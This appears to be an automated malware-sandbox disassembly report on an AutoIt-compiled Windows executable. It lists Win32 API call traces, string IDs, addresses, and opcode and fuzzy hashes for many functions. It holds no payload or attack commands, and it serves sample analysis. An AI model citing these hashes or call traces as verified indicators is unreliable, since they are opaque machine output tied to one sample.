                                                      • Opcode ID: 70f711e8545365fe95bb876a2bd77d89a40c94943be656321bc713fc8f8cd5ad
                                                      • Instruction ID: cce44db0c64cd6ed5bf95702ed00a581090348c65b30b3b2486f8a57e5cef3e4
                                                      • Opcode Fuzzy Hash: 70f711e8545365fe95bb876a2bd77d89a40c94943be656321bc713fc8f8cd5ad
                                                      • Instruction Fuzzy Hash: E8818A720182459FDB14DF14C985FAA7BECFF44714F088569ED8A8A0A3DBB0DE46CB61
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                      • API String ID: 1038674560-1810252412
                                                      • Opcode ID: a8b9cd22476fe83b954d910392183f31e6e2632fe1f0e94ede70bf2bbfd80c27
                                                      • Instruction ID: ed69ad0f28bcaab945140df51139ae38afdbdc104c323eafd9a75db2fdef9570
                                                      • Opcode Fuzzy Hash: a8b9cd22476fe83b954d910392183f31e6e2632fe1f0e94ede70bf2bbfd80c27
                                                      • Instruction Fuzzy Hash: D7319231A54245AADF14FB60CE63EEE77F89F20B50FA00565F451720E2EFA1AF44CA61
                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 00ABC4D4
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ABC4E6
                                                      • SetWindowTextW.USER32(?,?), ref: 00ABC4FD
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00ABC512
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00ABC518
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00ABC528
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00ABC52E
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ABC54F
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ABC569
                                                      • GetWindowRect.USER32(?,?), ref: 00ABC572
                                                      • SetWindowTextW.USER32(?,?), ref: 00ABC5DD
                                                      • GetDesktopWindow.USER32 ref: 00ABC5E3
                                                      • GetWindowRect.USER32(00000000), ref: 00ABC5EA
                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ABC636
                                                      • GetClientRect.USER32(?,?), ref: 00ABC643
                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ABC668
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ABC693
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                      • String ID:
                                                      • API String ID: 3869813825-0
                                                      • Opcode ID: 2a28b2e8d00c458a2ea465a0ed9fa4078ed14001cb8b3b1928d14c690bc0a4f0
                                                      • Instruction ID: eb0c11897e9862893cb3adb9bfe2200cadfbe3c5fa7ab40ebacf5f0df001b649
                                                      • Opcode Fuzzy Hash: 2a28b2e8d00c458a2ea465a0ed9fa4078ed14001cb8b3b1928d14c690bc0a4f0
                                                      • Instruction Fuzzy Hash: 99518170900749AFDB20DFA8DE89FAEBBF9FF04714F004528E686A65A1D774B905CB50
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AEA4C8
                                                      • DestroyWindow.USER32(?,?), ref: 00AEA542
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AEA5BC
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AEA5DE
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AEA5F1
                                                      • DestroyWindow.USER32(00000000), ref: 00AEA613
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A60000,00000000), ref: 00AEA64A
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AEA663
                                                      • GetDesktopWindow.USER32 ref: 00AEA67C
                                                      • GetWindowRect.USER32(00000000), ref: 00AEA683
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AEA69B
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AEA6B3
                                                        • Part of subcall function 00A625DB: GetWindowLongW.USER32(?,000000EB), ref: 00A625EC
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 1297703922-3619404913
                                                      • Opcode ID: d3d1dc5ff43ea47741a6f4ab670c15eb5cbfddcd64f3c881742487d7a4d5c2a0
                                                      • Instruction ID: 754fa07c9f77cd6352b9550714a3f32d034582a220e6b23b90c49399fd31f68b
                                                      • Opcode Fuzzy Hash: d3d1dc5ff43ea47741a6f4ab670c15eb5cbfddcd64f3c881742487d7a4d5c2a0
                                                      • Instruction Fuzzy Hash: 6E71AB71140285AFD720CF28CC49F6A7BF6FB99304F08492DF9958B2A0DB70E942CB12
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • DragQueryPoint.SHELL32(?,?), ref: 00AEC917
                                                        • Part of subcall function 00AEADF1: ClientToScreen.USER32(?,?), ref: 00AEAE1A
                                                        • Part of subcall function 00AEADF1: GetWindowRect.USER32(?,?), ref: 00AEAE90
                                                        • Part of subcall function 00AEADF1: PtInRect.USER32(?,?,00AEC304), ref: 00AEAEA0
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00AEC980
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AEC98B
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AEC9AE
                                                      • _wcscat.LIBCMT ref: 00AEC9DE
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AEC9F5
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00AECA0E
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00AECA25
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00AECA47
                                                      • DragFinish.SHELL32(?), ref: 00AECA4E
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00AECB41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 169749273-3440237614
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00AE46AB
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AE46F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 3974292440-4258414348
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AEBB6E
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AE9431), ref: 00AEBBCA
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AEBC03
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00AEBC46
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AEBC7D
                                                      • FreeLibrary.KERNEL32(?), ref: 00AEBC89
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AEBC99
                                                      • DestroyIcon.USER32(?,?,?,?,?,00AE9431), ref: 00AEBCA8
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AEBCC5
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AEBCD1
                                                        • Part of subcall function 00A8313D: __wcsicmp_l.LIBCMT ref: 00A831C6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 1212759294-1154884017
                                                      APIs
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • CharLowerBuffW.USER32(?,?), ref: 00ACA636
                                                      • GetDriveTypeW.KERNEL32 ref: 00ACA683
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ACA6CB
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ACA702
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ACA730
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 2698844021-4113822522
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00ACA47A
                                                      • __swprintf.LIBCMT ref: 00ACA49C
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00ACA4D9
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00ACA4FE
                                                      • _memset.LIBCMT ref: 00ACA51D
                                                      • _wcsncpy.LIBCMT ref: 00ACA559
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00ACA58E
                                                      • CloseHandle.KERNEL32(00000000), ref: 00ACA599
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00ACA5A2
                                                      • CloseHandle.KERNEL32(00000000), ref: 00ACA5AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2733774712-3457252023
                                                      APIs
                                                      • __wsplitpath.LIBCMT ref: 00ACDC7B
                                                      • _wcscat.LIBCMT ref: 00ACDC93
                                                      • _wcscat.LIBCMT ref: 00ACDCA5
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00ACDCBA
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ACDCCE
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00ACDCE6
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00ACDD00
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ACDD12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                      • String ID: *.*
                                                      • API String ID: 34673085-438819550
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AEC4EC
                                                      • GetFocus.USER32 ref: 00AEC4FC
                                                      • GetDlgCtrlID.USER32(00000000), ref: 00AEC507
                                                      • _memset.LIBCMT ref: 00AEC632
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00AEC65D
                                                      • GetMenuItemCount.USER32(?), ref: 00AEC67D
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00AEC690
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00AEC6C4
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00AEC70C
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AEC744
                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00AEC779
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                      • String ID: 0
                                                      • API String ID: 1296962147-4108050209
                                                      APIs
                                                        • Part of subcall function 00AB874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AB8766
                                                        • Part of subcall function 00AB874A: GetLastError.KERNEL32(?,00AB822A,?,?,?), ref: 00AB8770
                                                        • Part of subcall function 00AB874A: GetProcessHeap.KERNEL32(00000008,?,?,00AB822A,?,?,?), ref: 00AB877F
                                                        • Part of subcall function 00AB874A: HeapAlloc.KERNEL32(00000000,?,00AB822A,?,?,?), ref: 00AB8786
                                                        • Part of subcall function 00AB874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AB879D
                                                        • Part of subcall function 00AB87E7: GetProcessHeap.KERNEL32(00000008,00AB8240,00000000,00000000,?,00AB8240,?), ref: 00AB87F3
                                                        • Part of subcall function 00AB87E7: HeapAlloc.KERNEL32(00000000,?,00AB8240,?), ref: 00AB87FA
                                                        • Part of subcall function 00AB87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AB8240,?), ref: 00AB880B
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AB8458
                                                      • _memset.LIBCMT ref: 00AB846D
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AB848C
                                                      • GetLengthSid.ADVAPI32(?), ref: 00AB849D
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00AB84DA
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AB84F6
                                                      • GetLengthSid.ADVAPI32(?), ref: 00AB8513
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AB8522
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00AB8529
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AB854A
                                                      • CopySid.ADVAPI32(00000000), ref: 00AB8551
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AB8582
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AB85A8
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AB85BC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00AD76A2
                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00AD76AE
                                                      • CreateCompatibleDC.GDI32(?), ref: 00AD76BA
                                                      • SelectObject.GDI32(00000000,?), ref: 00AD76C7
                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00AD771B
                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00AD7757
                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00AD777B
                                                      • SelectObject.GDI32(00000006,?), ref: 00AD7783
                                                      • DeleteObject.GDI32(?), ref: 00AD778C
                                                      • DeleteDC.GDI32(00000006), ref: 00AD7793
                                                      • ReleaseDC.USER32(00000000,?), ref: 00AD779E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,00AEFB78), ref: 00ACA0FC
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 00ACA11E
                                                      • __swprintf.LIBCMT ref: 00ACA177
                                                      • __swprintf.LIBCMT ref: 00ACA190
                                                      • _wprintf.LIBCMT ref: 00ACA246
                                                      • _wprintf.LIBCMT ref: 00ACA264
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 311963372-2391861430
                                                      • Opcode ID: 1ae09c200ae9dfedfbf7fcf97e48be0ce2fa710aaa8fbb0c473d78331b9a56b1
                                                      • Instruction ID: 3145311363c69e8f7dc14bf4ee9ae3f86689cc192487f0b669a3db770e689d21
                                                      • Opcode Fuzzy Hash: 1ae09c200ae9dfedfbf7fcf97e48be0ce2fa710aaa8fbb0c473d78331b9a56b1
                                                      • Instruction Fuzzy Hash: 4B516E32900219AACF15EBE0CE96EFEB7B9AF14304F144165F515730A2EB316F59CB61
                                                      APIs
                                                        • Part of subcall function 00A80B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A66C6C,?,00008000), ref: 00A80BB7
                                                        • Part of subcall function 00A648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A648A1,?,?,00A637C0,?), ref: 00A648CE
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A66D0D
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A66E5A
                                                        • Part of subcall function 00A659CD: _wcscpy.LIBCMT ref: 00A65A05
                                                        • Part of subcall function 00A8387D: _iswctype.LIBCMT ref: 00A83885
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                      • API String ID: 537147316-1018226102
                                                      • Opcode ID: f3ddc615781f4c9e7fd155600aef788331d66c90b577acc47f2fe400c4ac35aa
                                                      • Instruction ID: bbe28332b4069eca9a1158219bd056a2fc5a50ff6f7c77515d48b0b5a0284a5b
                                                      • Opcode Fuzzy Hash: f3ddc615781f4c9e7fd155600aef788331d66c90b577acc47f2fe400c4ac35aa
                                                      • Instruction Fuzzy Hash: AF02AB315083409FCB24EF24CA91AAFBBF5BF99354F04492DF486972A2DB31D949CB42
                                                      APIs
                                                      • _memset.LIBCMT ref: 00A645F9
                                                      • GetMenuItemCount.USER32(00B26890), ref: 00A9D7CD
                                                      • GetMenuItemCount.USER32(00B26890), ref: 00A9D87D
                                                      • GetCursorPos.USER32(?), ref: 00A9D8C1
                                                      • SetForegroundWindow.USER32(00000000), ref: 00A9D8CA
                                                      • TrackPopupMenuEx.USER32(00B26890,00000000,?,00000000,00000000,00000000), ref: 00A9D8DD
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A9D8E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                      • String ID:
                                                      • API String ID: 2751501086-0
                                                      • Opcode ID: b1526f6c87f045e4119ea312bf081e1d657da3a908f3d1683c94b386d4ad8cc4
                                                      • Instruction ID: 4bd528583b2460158c9f7e5fc87877c532b644790d4509624c466179d5a19a0d
                                                      • Opcode Fuzzy Hash: b1526f6c87f045e4119ea312bf081e1d657da3a908f3d1683c94b386d4ad8cc4
                                                      • Instruction Fuzzy Hash: 9B71D374701245BEEF219FA4DC85FAABFB4FF05364F204216F515AA1E1C7B15850DBA0
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AE0038,?,?), ref: 00AE10BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
